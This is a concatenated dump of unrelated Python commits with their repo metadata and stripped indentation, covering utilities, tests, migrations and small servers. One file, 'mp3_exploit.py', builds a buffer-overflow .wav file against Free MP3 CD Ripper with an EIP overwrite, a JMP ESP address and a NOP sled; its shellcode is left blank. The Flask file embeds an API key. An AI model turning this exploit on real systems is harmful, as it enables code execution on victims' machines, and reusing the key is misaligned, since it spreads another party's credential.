'org.freedesktop.Telepathy.Connection.Interface.Capabilities')
@match('dbus-signal', signal='StatusChanged', args=[0, 1])
def expect_connected(event, data):
presence = make_presence('bob@foo.com/Foo', None, 'hello')
presence.addElement('priority', None, '0')
c = presence.addElement(('http://jabber.org/protocol/caps', 'c'))
c['node'] = 'http://telepathy.freedesktop.org/caps'
c['ver'] = '0.5.14'
c['ext'] = 'voice-v1 jingle-audio jingle-video'
data['stream'].send(presence)
return True
@lazy
@match('dbus-signal', signal='CapabilitiesChanged',
args=[[(2, u'org.freedesktop.Telepathy.Channel.Type.StreamedMedia', 0,
3, 0, 3)]])
def expect_CapabilitiesChanged(event, data):
data['conn_iface'].Disconnect()
return True
@match('dbus-signal')
def expect_disconnected(event, data):
assert event.signal != 'CapabilitiesChanged'
if event.signal == 'StatusChanged' and event.args == [2, 1]:
return True
return False
if __name__ == '__main__':
go()
| lgpl-2.1 | Python |
1ef3c14af249f211df4cdad89cdd49d7f2845eb1 | Add share count using Flask. | comicpanda/share-count-server,comicpanda/share-count-server | flask_share_count.py | flask_share_count.py | from flask import Flask, jsonify, request
import grequests, re, json
app = Flask(__name__)
FACEBOOK = 'https://api.facebook.com/method/links.getStats?urls=%s&format=json'
TWITTER = 'http://urls.api.twitter.com/1/urls/count.json?url=%s&callback=count'
REDDIT = 'http://buttons.reddit.com/button_info.json?url=%s'
STUMBLEUPON = 'http://www.stumbleupon.com/services/1.01/badge.getinfo?url=%s'
PINTEREST = 'http://widgets.pinterest.com/v1/urls/count.json?source=6&url=%s'
GOOGLE_PLUS = 'https://clients6.google.com/rpc?key=AIzaSyCKSbrvQasunBoV16zDH9R33D88CeLr9gQ'
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/count')
def total_count():
target_url = request.args.get('url')
params = []
param = {}
param['method'] = 'pos.plusones.get'
param['id'] = 'p'
param['params'] = {}
param['params']['nolog'] = True
param['params']['id'] = target_url
param['params']['source'] = 'widget'
param['params']['userId'] = '@viewer'
param['params']['groupId'] = '@self'
param['jsonrpc'] = '2.0'
param['key'] = 'p'
param['apiVersion'] = 'v1'
params.append(param)
json_param = json.dumps(params)
try:
requests = (
grequests.get(FACEBOOK % (target_url)),
grequests.get(TWITTER % (target_url)),
grequests.get(REDDIT % (target_url)),
grequests.get(STUMBLEUPON % (target_url)),
grequests.get(PINTEREST % (target_url)),
grequests.post(GOOGLE_PLUS, data=json_param)
)
except:
return jsonify(result='error', total=-1)
responses = grequests.map(requests)
print dir(responses[0])
counts = (
parse_facebook(responses[0]),
parse_twitter(responses[1]),
parse_reddit(responses[2]),
parse_stumbleupon(responses[3]),
parse_pinterest(responses[4]),
parse_googleplus(responses[5])
)
print counts
total_count = 0
for count in counts:
total_count += count
return jsonify(result='success', total= total_count)
def parse_facebook(res):
facebook_data = res.json()[0]
return facebook_data['share_count'] + facebook_data['like_count']
def parse_twitter(res):
m = re.search(r'{.+}', res.content)
raw_data = m.group(0)
return json.loads(raw_data)['count']
def parse_reddit(res):
print 'reddit:'
print res.json()
if 'children' in res.json()['data'] and res.json()['data']['children']:
return res.json()['data']['children'][0]['data']['score']
return 0
def parse_stumbleupon(res):
if 'views' in res.json()['result']:
return int(res.json()['result']['views'])
return 0
def parse_pinterest(res):
m = re.search(r'{.+}', res.content)
return json.loads(m.group(0))['count']
def parse_googleplus(res):
return int(res.json()[0]['result']['metadata']['globalCounts']['count'])
if __name__ == '__main__':
app.run(port=8000, debug=True)
| apache-2.0 | Python |
|
7311f8f2a8a7ab285669dc02d26d7e2248583ff5 | Add tests for 'rle_compress' | ziotom78/polycomp | test_rle.py | test_rle.py | import pypolycomp
import numpy as np
def test_compression():
for cur_type in (np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64):
compressed = pypolycomp.rle_compress(np.array([1, 1, 1, 2, 3], dtype=cur_type))
assert np.all(compressed == np.array([3, 1, 1, 2, 1, 3], dtype=cur_type))
| bsd-3-clause | Python |
|
da2b773bf6e669b3ec50bbd6af73e1d80bb0b5a5 | Add tsstats/event.py for easy event-initialization | Thor77/TeamspeakStats,Thor77/TeamspeakStats | tsstats/events.py | tsstats/events.py | from collections import namedtuple
Event = namedtuple(
'Event', ['timestamp', 'identifier', 'action', 'arg', 'arg_is_client']
)
def nick(timestamp, identifier, nick):
return Event(timestamp, identifier, 'set_nick', nick, arg_is_client=False)
def connect(timestamp, identifier):
return Event(
timestamp, identifier, 'connect', arg=timestamp, arg_is_client=False
)
def disconnect(timestamp, identifier):
return Event(
timestamp, identifier, 'disconnect', arg=timestamp, arg_is_client=False
)
def kick(timestamp, identifier, target_identifier):
return Event(
timestamp, identifier, 'kick', target_identifier, arg_is_client=True
)
def ban(timestamp, identifier, target_identifier):
return Event(
timestamp, identifier, 'ban', target_identifier, arg_is_client=True
)
| mit | Python |
|
99f5c2a9cd44ac8ed301a781460816e8f0dffdb8 | add killall.py example script | hybridlogic/psutil,hybridlogic/psutil,hybridlogic/psutil | examples/killall.py | examples/killall.py | #!/usr/bin/env python
"""
Kill a process by name.
"""
import os
import sys
import psutil
def main():
if len(sys.argv) != 2:
sys.exit('usage: %s name' % __file__)
else:
NAME = sys.argv[1]
killed = []
for proc in psutil.process_iter():
if proc.name == NAME and proc.pid != os.getpid():
proc.kill()
killed.append(proc.pid)
if not killed:
sys.exit('%s: no process found' % NAME)
else:
sys.exit(0)
sys.exit(main())
| bsd-3-clause | Python |
|
20c08b96ce7a5377576e45953266c51079b5bdeb | Create testfile.py | tesssny/firstrepository | testfile.py | testfile.py | print("Tess is cool")
| mit | Python |
|
d75eebbcb6b1922d37a97550bc4cbead6e50cfdb | add localdb.py | muchu1983/bennu,muchu1983/bennu,muchu1983/united | united/localdb.py | united/localdb.py | # -*- coding: utf-8 -*-
"""
Copyright (C) 2015, MuChu Hsu
Contributed by Muchu Hsu (muchu1983@gmail.com)
This file is part of BSD license
<https://opensource.org/licenses/BSD-3-Clause>
"""
import sqlite3
import os
import logging
from pkg_resources import resource_filename
"""
資料庫存取 類別
"""
class SQLite3Db:
#建構子
def __init__(self):
logging.basicConfig(level=logging.INFO)
dbPath = resource_filename("cameo_res", "local.db")
if os.path.exists(dbPath):#建立連線
logging.info("connect to sqlite3 db.")
self.conn = sqlite3.connect(dbPath)
else: #初始化資料庫並建立連線
logging.info("connect to sqlite3 db with initialization.")
self.conn = sqlite3.connect(dbPath)
c = self.conn.cursor()
c.execute("""CREATE TABLE table
(id INTEGER PRIMARY KEY)""")
self.conn.commit()
#解構子
def __del__(self):
logging.info("close sqlite3 db connection.")
self.conn.close() #關閉資料庫連線
# 執行 SQL 並 commit (適用於 INSERT、UPDATE、DELETE)
def commitSQL(self, strSQL=None):
c = self.conn.cursor()
c.execute(strSQL)
self.conn.commit()
# 執行 SQL 並 fetchall 資料 (適用於 SELECT)
def fetchallSQL(self, strSQL=None):
c = self.conn.cursor()
c.execute(strSQL)
return c.fetchall() | bsd-3-clause | Python |
|
b6d1b9365c356a14f0f9ef478247d498845a2b2c | add script to process normal vectors | bast/flanders,bast/flanders | coastline/data/vectors.py | coastline/data/vectors.py | import matplotlib.pyplot as plt
import glob
import math
def extract_data(file_name):
points = []
with open(file_name, 'r') as f:
for i, line in enumerate(f):
if i > 2:
s = line.split()
point = (float(s[0]), float(s[1]))
points.append(point)
return points
def normalize(vector, s):
norm = math.sqrt(vector[0]**2.0 + vector[1]**2.0)
return (s*vector[0]/norm, s*vector[1]/norm)
def get_normal_vectors(points):
num_points = len(points)
vectors = []
for i in range(num_points):
i_before = i - 1
i_after = (i + 1)%num_points
vector = (points[i_after][1] - points[i_before][1], -(points[i_after][0] - points[i_before][0]))
vector = normalize(vector, 5000.0)
vectors.append(vector)
return vectors
def add_plot(file_name, style):
points = extract_data(file_name)
if len(points) > 3: # for the moment cannot handle linear islands
ax = plt.axes()
vectors = get_normal_vectors(points)
for i in range(len(points)):
ax.arrow(points[i][0], points[i][1], vectors[i][0], vectors[i][1], head_width=0.1, head_length=0.1, fc='k', ec='k')
(xs, ys) = zip(*points)
plt.plot(xs, ys, style)
for f in glob.glob('*.txt'):
add_plot(f, 'r-')
#axes = plt.gca()
#axes.set_xlim([-20.0, 0.0])
#axes.set_ylim([40.0, 60.0])
plt.show()
| mpl-2.0 | Python |
|
1ac09013e8cf89e83418de0be9d83b87a0a20634 | Create mp3_exploit.py | funkandwagnalls/pythonpentest,funkandwagnalls/pythonpentest,funkandwagnalls/pythonpentest,liorvh/pythonpentest,liorvh/pythonpentest,liorvh/pythonpentest | mp3_exploit.py | mp3_exploit.py | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Purpose: To provide a means to demonstrate a simple file upload proof of concept related to
exploiting Free MP3 CD Ripper.
'''
import struct
filename="exploit.wav"
fill ="A"*4112
#eip = struct.pack('<I',0x42424242) # EIP overwrite verfication
eip = struct.pack('<I',0x7C874413) # JMP ESP instruction from Kernel32.dll
nop = "\x90"*16
# Place for calc.exe shellcode
calc = ()
# Place for actual shellcode
shell =()
#exploit = fill + eip + nop + calc #loader for simple proof of concept for shell cdoe
exploit = fill + eip + nop + shell #loader for real shell access
writeFile = open (filename, "w")
writeFile.write(exploit)
writeFile.close()
| bsd-3-clause | Python |
|
68ea60fd87e3e0240f82a42f0f6b4dcd65732f97 | Add MQTT server example | fabaff/mqtt-panel,fabaff/mqtt-panel,fabaff/mqtt-panel | mqtt-server.py | mqtt-server.py | #!/usr/bin/python3
#
# Copyright (c) 2015-2016, Fabian Affolter <fabian@affolter-engineering.ch>
# Released under the MIT license. See LICENSE file for details.
#
# Source: https://github.com/beerfactory/hbmqtt/blob/develop/samples/broker_start.py
#
import logging
import asyncio
import os
from hbmqtt.broker import Broker
logger = logging.getLogger(__name__)
config = {
'listeners': {
'default': {
'type': 'tcp',
'bind': '0.0.0.0:1883',
},
'ws-mqtt': {
'bind': '127.0.0.1:3000',
'type': 'ws',
'max_connections': 10,
},
},
}
broker = Broker(config)
@asyncio.coroutine
def test_coro():
yield from broker.start()
if __name__ == '__main__':
formatter = "[%(asctime)s] :: %(levelname)s :: %(name)s :: %(message)s"
logging.basicConfig(level=logging.INFO, format=formatter)
asyncio.get_event_loop().run_until_complete(test_coro())
asyncio.get_event_loop().run_forever()
| mit | Python |
|
c0b05a43e10693f8aab87a7f86726d512b7494fc | Add tenant exporter for accounting | onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | bluebottle/clients/management/commands/export_tenants.py | bluebottle/clients/management/commands/export_tenants.py | import json
from rest_framework.authtoken.models import Token
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand
from bluebottle.clients import properties
from bluebottle.clients.models import Client
from bluebottle.clients.utils import LocalTenant
class Command(BaseCommand):
help = 'Export tenants, so that we can import them into the accounting app'
def add_arguments(self, parser):
parser.add_argument('--file', type=str, default=None, action='store')
def handle(self, *args, **options):
results = []
for client in Client.objects.all():
properties.set_tenant(client)
with LocalTenant(client, clear_tenant=True):
ContentType.objects.clear_cache()
accounts = []
for merchant in properties.MERCHANT_ACCOUNTS:
if merchant['merchant'] == 'docdata':
accounts.append(
{
'service_type': 'docdata',
'username': merchant['merchant_name']
}
)
api_key = Token.objects.get(user__username='accounting').key
results.append({
"name": client.schema_name,
"domain": properties.TENANT_MAIL_PROPERTIES['website'],
"api_key": api_key,
"accounts": accounts
})
if options['file']:
text_file = open(options['file'], "w")
text_file.write(json.dumps(results))
text_file.close()
else:
print json.dumps(results)
| bsd-3-clause | Python |
|
dfbf888ca0b56448a4f211900b16e3c85648b241 | Add migration for changing docstring of Note.is_private to unicode | editorsnotes/editorsnotes,editorsnotes/editorsnotes | editorsnotes/main/migrations/0025_auto_20160628_0913.py | editorsnotes/main/migrations/0025_auto_20160628_0913.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-28 09:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0024_topic_ld'),
]
operations = [
migrations.AlterField(
model_name='note',
name='is_private',
field=models.BooleanField(default=False, help_text="If true, will only be be viewable to users who belong to the note's project."),
),
]
| agpl-3.0 | Python |
|
a45a0bb366ae28d38d543ce71f32f625e9b80042 | add tools module | multidis/bitQuant,rosspalmer/bitQuant | modules/tools.py | modules/tools.py | from pandas import DataFrame
from pandas.tseries.tools import to_datetime
#|Create time series from trade history DataFrame
def time_series(df, period):
ts = DataFrame(columns=('timestamp', 'price', 'high',
'low', 'open', 'amount'))
tmin = int(df['timestamp'].min())
tmax = int(df['timestamp'].max())
for tsmp in range(tmin, tmax, period):
slic = time_slice(df, tsmp, period)
ts = ts.append(slic)
ts = date_index(ts)
return ts
def time_slice(df, tsmp, period):
lprice = df[df['timestamp'] < tsmp].tail(1)['price']
df = df[df['timestamp'] >= tsmp]
df = df[df['timestamp'] < (tsmp + period)]
if len(df.index) == 0:
slic = DataFrame({'timestamp' : [tsmp], 'price': lprice,
'high': lprice, 'low': lprice,
'open': lprice, 'amount': 0.0})
else:
slic = DataFrame({'timestamp' : [tsmp],
'price': round(df['price'].iloc[-1], 3),
'high': round(df['price'].max(), 3),
'low': round(df['price'].min(), 3),
'open': round(df['price'].iloc[0], 3),
'amount': round(df['amount'].sum(), 4)})
return slic
#|Create datetime index for DataFrame using "timestamp" column
def date_index(df):
date = df['timestamp']
date = to_datetime(date, unit='s')
df['date'] = date
df = df.set_index('date')
return df
#Outputs number of seconds in provided number of days/hours/minutes
def seconds(days=0, hours=0, minutes=0, typ=''):
if typ == '':
total = 86400*days + 3600*hours + 60*minutes
elif typ == 'd':
total = 86400
elif typ == 'h':
total = 3600
elif typ == 'm':
total = 50
return total
| mit | Python |
|
2f4d413e14011847138d6afd27a210fc58823c8a | add certificate and key migrations | deis/workflow,deis/workflow,deis/workflow | rootfs/api/migrations/0004_auto_20160124_2134.py | rootfs/api/migrations/0004_auto_20160124_2134.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-24 21:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0003_auto_20160114_0310'),
]
operations = [
migrations.AlterField(
model_name='certificate',
name='expires',
field=models.DateTimeField(editable=False),
),
migrations.AlterField(
model_name='key',
name='fingerprint',
field=models.CharField(editable=False, max_length=128),
),
]
| mit | Python |
|
d1aa553f739e91cd470eea23042b6c8bcebe9b6f | add mocked integrationtest for the deprecationwarning of makeitem | RonnyPfannschmidt/pytest,The-Compiler/pytest,hackebrot/pytest,Akasurde/pytest,txomon/pytest,rmfitzpatrick/pytest,davidszotten/pytest,alfredodeza/pytest,nicoddemus/pytest,pfctdayelise/pytest,markshao/pytest,tomviner/pytest,ddboline/pytest,The-Compiler/pytest,nicoddemus/pytest,tareqalayan/pytest,tomviner/pytest,pytest-dev/pytest | testing/python/test_deprecations.py | testing/python/test_deprecations.py | import pytest
from _pytest.python import PyCollector
class PyCollectorMock(PyCollector):
"""evil hack"""
def __init__(self):
self.called = False
def _makeitem(self, *k):
"""hack to disable the actual behaviour"""
self.called = True
def test_pycollector_makeitem_is_deprecated():
collector = PyCollectorMock()
with pytest.deprecated_call():
collector.makeitem('foo', 'bar')
assert collector.called
| mit | Python |
|
e348ec573a4882258466cdc2ab73da8b4dbbe256 | Create pillu.py | jasuka/pyBot,jasuka/pyBot | modules/pillu.py | modules/pillu.py | #test
| mit | Python |
|
1eb2e1390d41c65943e777a66918df87b4ee8799 | Add constructive_hierarchy | louisswarren/hieretikz | constructive_hierarchy.py | constructive_hierarchy.py | '''Reason about a directed graph in which the (non-)existance of some edges
must be inferred by the disconnectedness of certain vertices. Collect (truthy)
evidence for boolean function return values.'''
def transitive_closure_set(vertices, edges):
'''Find the transitive closure of a set of vertices.'''
neighbours = {b: (a, b) for a, b in edges if a in vertices}
if set(neighbours).issubset(vertices):
return vertices
return transitive_closure_set(vertices | neighbours, edges)
#def downward_closure(vertex, edges):
# '''Find the downward closure of a vertex.'''
# return transitive_closure_set({vertex}, edges)
#
#def upward_closure(vertex, edges):
# '''Find the upward closure of a vertex.'''
# return transitive_closure_set({vertex}, {(b, a) for a, b in edges})
#
#def is_connected(a, b, edges):
# '''Check if there is a path from a to b.'''
# return b in downward_closure(a, edges)
#
#def is_separated(a, b, edges, disconnections):
# '''Check that a and b will remain not connected even if edges are added to
# the graph, as long as the vertex pairs listed in disconnections remain
# disconected.'''
# return any((p, q) in disconnections
# for p in upward_closure(a, edges)
# for q in downward_closure(b, edges))
#
#def find_possible_connections(vertices, edges, disconnections):
# '''Find which edges can be added to create new connections, without
# connecting any pairs in disconnections.'''
# return {(a, b) for a in vertices for b in vertices if
# not is_connected(a, b, edges) and
# not is_separated(a, b, edges, disconnections)}
#
#def is_isthmus(edge, edges):
# return not is_connected(*edge, edges - {edge})
#
#def spanning_tree(edges):
# for edge in edges:
# if not is_isthmus(edge, edges):
# return spanning_tree(edges - {edge})
# return edges
#
#def rank_possible_edge(edge, vertices, edges, disconnections):
# evaluator = lambda x, y: len(find_possible_connections(vertices, x, y))
# exists_rank = evaluator(edges | {edge}, disconnections)
# not_exists_rank = evaluator(edges, disconnections | {edge})
# return abs(exists_rank) + abs(not_exists_rank)
| mit | Python |
|
25ff8c6f8bc9d70886d004f8b64f08facb8c12cf | Create Find the Celebrity sol for Leetcode | Chasego/cod,cc13ny/algo,cc13ny/Allin,Chasego/cod,cc13ny/Allin,cc13ny/algo,Chasego/codirit,Chasego/codirit,cc13ny/algo,cc13ny/Allin,cc13ny/algo,Chasego/codirit,cc13ny/algo,Chasego/codi,Chasego/codi,Chasego/codi,cc13ny/Allin,Chasego/codirit,Chasego/codi,Chasego/cod,Chasego/codi,Chasego/codirit,Chasego/cod,cc13ny/Allin,Chasego/cod | leetcode/277-Find-the-Celebrity/FindtheCelebrity_sol.py | leetcode/277-Find-the-Celebrity/FindtheCelebrity_sol.py | # The knows API is already defined for you.
# @param a, person a
# @param b, person b
# @return a boolean, whether a knows b
# def knows(a, b):
class Solution(object):
def findCelebrity(self, n):
"""
:type n: int
:rtype: int
"""
if n < 2:
return -1
candidate = 0
for i in range(1, n):
if not knows(i, candidate):
candidate = i
for i in range(n):
if i == candidate:
continue
if not knows(i, candidate) or knows(candidate, i):
return -1
return candidate
| mit | Python |
|
3eeaa890f0a7afcf7a6f470055c5bc0fda20ae5c | create moistureCaptor.py | TyBeeProject/TyBeeHive | captors-enabled/moistureCaptor.py | captors-enabled/moistureCaptor.py |
class Captor():
id = 5
def Captor():
self.id = 5
def callback(self):
moisture = 0
#start communication with server
return moisture
def getiId(self):
return self.id
| mit | Python |
|
25aa486fcba631a251db4f0366d4d4f713a86f37 | Add missing migration file | sigmapi-gammaiota/sigmapi-web,sigmapi-gammaiota/sigmapi-web,sigmapi-gammaiota/sigmapi-web,sigmapi-gammaiota/sigmapi-web | SigmaPi/UserInfo/migrations/0003_auto_20170204_1342.py | SigmaPi/UserInfo/migrations/0003_auto_20170204_1342.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('UserInfo', '0002_auto_20161208_1712'),
]
operations = [
migrations.AlterModelOptions(
name='pledgeclass',
options={'ordering': ['dateInitiated'], 'verbose_name': 'Pledge Class', 'verbose_name_plural': 'Pledge Classes'},
),
]
| mit | Python |
|
5e51cda3a7441f6e31477988b1288d1497fe23d9 | Add arguments snippet | ScriptRock/content,ScriptRock/content,ScriptRock/content,ScriptRock/content,ScriptRock/content,ScriptRock/content | code/python/snippets/arguments.py | code/python/snippets/arguments.py | """
Add command line arguments to your script.
This snippet adds the default command line arguments required for any interaction with the UpGuard API.
To Use:
1. Copy snippet to the top of your script
2. Populate description (this is shown when running `--help`)
3. Access arguments with `args` object, for example: `args.target_url`
"""
import argparse
parser = argparse.ArgumentParser(description='Retrieve a list of open User Tasks and their associated nodes')
parser.add_argument('--target-url', required=True, help='URL for the UpGuard instance')
parser.add_argument('--api-key', required=True, help='API key for the UpGuard instance')
parser.add_argument('--secret-key', required=True, help='Secret key for the UpGuard instance')
parser.add_argument('--insecure', action='store_true', help='Ignore SSL certificate checks')
args = parser.parse_args()
| mit | Python |
|
8bdc9c0685500b822787779b5ebffa46b00d8138 | Add script | Antidisestablishmentarianism/lightshow | lightshow.py | lightshow.py | #!/usr/bin/sudo / usr/bin/python
import RPi.GPIO as GPIO
from time import sleep
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
leds = {'floor':[], 'top-left':[]}
def setupled(name, pins):
for i in range(0, 3):
GPIO.setup(pins[i], GPIO.OUT)
leds[name].append(GPIO.PWM(pins[i], 100))
setupled('floor', [11, 13, 15])
setupled('top-left', [12, 16, 18])
for key, value in leds.items():
for i in value:
i.start(0)
WHITE = [255, 255, 255]
BLACK = [0, 0, 0]
RED = [255, 0, 0]
GREEN = [0, 255, 0]
BLUE = [0, 0, 255]
YELLOW = [255, 255, 0]
PURPLE = [255, 0, 255]
CYAN = [0, 255, 255]
def setcolor(led, color):
for i in xrange(0, 3):
leds[led][i].ChangeDutyCycle((255 - color[i]) * 100 / 255)
print('Setting {} to {}'.format(led, color))
# Start program here
while True:
setcolor('floor', RED)
sleep(1)
setcolor('top-left', GREEN)
sleep(1)
setcolor('floor', BLUE)
sleep(1)
setcolor('top-left', YELLOW)
sleep(1)
setcolor('floor', PURPLE)
sleep(1)
setcolor('top-left', CYAN)
sleep(1)
setcolor('floor', WHITE)
sleep(1)
setcolor('top-left', BLACK)
sleep(1)
for i in xrange(0, 256):
setcolor('floor', [i, i, i])
sleep(0.01)
for x in xrange(0, 256):
y = 255 - x
setcolor('top-left', [y, y, y])
sleep(0.01)
for key, value in rooms.items():
for i in value:
i.stop()
GPIO.cleanup()
| mit | Python |
|
1a4052deb8e0ab2deb7038220ae23d7bb9311ce9 | Add initial version of the script | agarstang/vmware-ofv-to-facter | ovf_to_facter.py | ovf_to_facter.py | #!/usr/bin/python
#stdlib
import json
import os
import subprocess
from xml.dom.minidom import parseString
def which(cmd):
"""Python implementation of `which` command."""
for path in os.environ["PATH"].split(os.pathsep):
file = os.path.join(path, cmd)
if os.path.exists(file) and os.access(file, os.X_OK):
return file
elif os.name == "nt":
for ext in os.environ["PATHEXT"].split(os.pathsep):
full = file + ext
if os.path.exists(full) and os.access(full, os.X_OK):
return full
return None
FACTER = which("facter")
VMTOOLS = which("vmtoolsd")
def facter(*args):
facts = json.loads(subprocess.check_output([FACTER, '--json', '--no-external'] + [ arg for arg in args ]))
return facts
def findXmlSection(dom, sectionName):
sections = dom.getElementsByTagName(sectionName)
return sections[0]
def getOVFProperties(ovfEnv):
dom = parseString(ovfEnv)
section = findXmlSection(dom, "PropertySection")
propertyMap = {}
for property in section.getElementsByTagName("Property"):
key = property.getAttribute("oe:key")
value = property.getAttribute("oe:value")
propertyMap[key] = value
dom.unlink()
return propertyMap
def getVMWareOvfEnv():
if VMTOOLS == None:
raise Exception("VMWare Tools not installed.")
try:
ovf = subprocess.check_output([VMTOOLS, '--cmd', 'info-get guestinfo.ovfenv'], stderr=subprocess.STDOUT)
properties = getOVFProperties(ovf)
print "ovf=true"
for key, value in properties.iteritems():
print "ovf_" + key + "=" + value
except:
print "ovf=false"
return
if __name__ == "__main__":
facts = facter("is_virtual", "virtual")
if (facts['is_virtual'] == 'true') and (facts['virtual'] == 'vmware'):
getVMWareOvfEnv()
| mit | Python |
|
2f0ba9368bc44cffce1dcf2ec483aabf04c2e127 | add python #5 | ryanbmilbourne/euler,ryanbmilbourne/euler | python/5.py | python/5.py | #!/usr/bin/env python
'''
Problem
=======
2520 is the smallest number that can be divided by each of the numbers from 1 to 10
without any remainder. What is the smallest positive number that is evenly divisible
by all of the numbers from 1 to 20?
Latest Run Stats
====== === =====
'''
from math import ceil
from math import sqrt
def primeSieve(num):
noprimes = {j for i in range(2, int(ceil(sqrt(num)))) for j in range(i*2, num, i)}
return {i for i in range(2, num) if i not in noprimes}
def anyDivisible(nums, divisor):
for i in nums:
if i%divisor == 0:
return True
return False
limit = 20 #upper limit for divisors
divisors = range(2,limit+1)
primes = primeSieve(max(divisors))
primeFactors = []
# Use a LCM table to determine the prime factors that make up the solution
for prime in primes:
if divisors == []:
break
while True:
divisible = anyDivisible(divisors, prime)
if not divisible:
break
divisors = [i if i% prime != 0 else i/prime for i in divisors]
divisors = [i for i in divisors if i > 1]
primeFactors.append(prime)
answer = reduce(lambda primeFactor, total: primeFactor*total, primeFactors)
print answer #should be only print statement
| mit | Python |
|
fdf8cb1f0420eef27592d32f2e10066482304314 | Add region protection tests for system readers | openstack/keystone,openstack/keystone,mahak/keystone,mahak/keystone,openstack/keystone,mahak/keystone | keystone/tests/unit/protection/v3/test_regions.py | keystone/tests/unit/protection/v3/test_regions.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from six.moves import http_client
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _UserRegionTests(object):
"""Common default functionality for all users."""
def test_user_can_get_a_region(self):
region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())
with self.test_client() as c:
c.get('/v3/regions/%s' % region['id'], headers=self.headers)
def test_user_can_list_regions(self):
expected_regions = []
for _ in range(2):
region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())
expected_regions.append(region['id'])
with self.test_client() as c:
r = c.get('/v3/regions', headers=self.headers)
for region in r.json['regions']:
self.assertIn(region['id'], expected_regions)
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_UserRegionTests):
def setUp(self):
super(SystemReaderTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_reader = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.user_id = PROVIDERS.identity_api.create_user(
system_reader
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.user_id, self.bootstrapper.reader_role_id
)
auth = self.build_authentication_request(
user_id=self.user_id, password=system_reader['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
def test_user_cannot_create_regions(self):
create = {'region': {'description': uuid.uuid4().hex}}
with self.test_client() as c:
c.post(
'/v3/regions', json=create, headers=self.headers,
expected_status_code=http_client.FORBIDDEN
)
def test_user_cannot_update_regions(self):
region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())
with self.test_client() as c:
update = {'region': {'description': uuid.uuid4().hex}}
c.patch(
'/v3/regions/%s' % region['id'], json=update,
headers=self.headers,
expected_status_code=http_client.FORBIDDEN
)
def test_user_cannot_delete_regions(self):
region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())
with self.test_client() as c:
c.delete(
'/v3/regions/%s' % region['id'],
headers=self.headers,
expected_status_code=http_client.FORBIDDEN
)
| apache-2.0 | Python |
|
459f87be465e0f5554c708fe60679494d152c8fd | Create permissions.py | dfurtado/generator-djangospa,dfurtado/generator-djangospa,dfurtado/generator-djangospa | templates/root/main/permissions.py | templates/root/main/permissions.py | from rest_framework import permissions
class IsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permissions(self, request, view, obj):
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD, or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to the owner of the snippet.
return obj.owner == request.user
| mit | Python |
|
4a98686b63563b209456a8933ef34477adcdae43 | extend Phabricator class and do nothing | TidalLabs/py-phabricate | phabricate/phab.py | phabricate/phab.py | from phabricator import Phabricator as _Phabricator
class Phabricator(_Phabricator):
pass
| bsd-3-clause | Python |
|
cca6b0c28747a3b0307fccd33dee60fcb42d910d | Test Fix. | leoc/home-assistant,JshWright/home-assistant,fbradyirl/home-assistant,kennedyshead/home-assistant,emilhetty/home-assistant,aequitas/home-assistant,happyleavesaoc/home-assistant,jabesq/home-assistant,keerts/home-assistant,Cinntax/home-assistant,deisi/home-assistant,kyvinh/home-assistant,devdelay/home-assistant,jamespcole/home-assistant,adrienbrault/home-assistant,alexmogavero/home-assistant,deisi/home-assistant,varunr047/homefile,jnewland/home-assistant,mikaelboman/home-assistant,rohitranjan1991/home-assistant,Duoxilian/home-assistant,PetePriority/home-assistant,miniconfig/home-assistant,sdague/home-assistant,srcLurker/home-assistant,keerts/home-assistant,leoc/home-assistant,auduny/home-assistant,mikaelboman/home-assistant,ma314smith/home-assistant,LinuxChristian/home-assistant,alexmogavero/home-assistant,bdfoster/blumate,deisi/home-assistant,ct-23/home-assistant,morphis/home-assistant,oandrew/home-assistant,tchellomello/home-assistant,srcLurker/home-assistant,devdelay/home-assistant,PetePriority/home-assistant,GenericStudent/home-assistant,emilhetty/home-assistant,morphis/home-assistant,JshWright/home-assistant,coteyr/home-assistant,JshWright/home-assistant,rohitranjan1991/home-assistant,hmronline/home-assistant,shaftoe/home-assistant,postlund/home-assistant,nugget/home-assistant,mKeRix/home-assistant,MungoRae/home-assistant,mez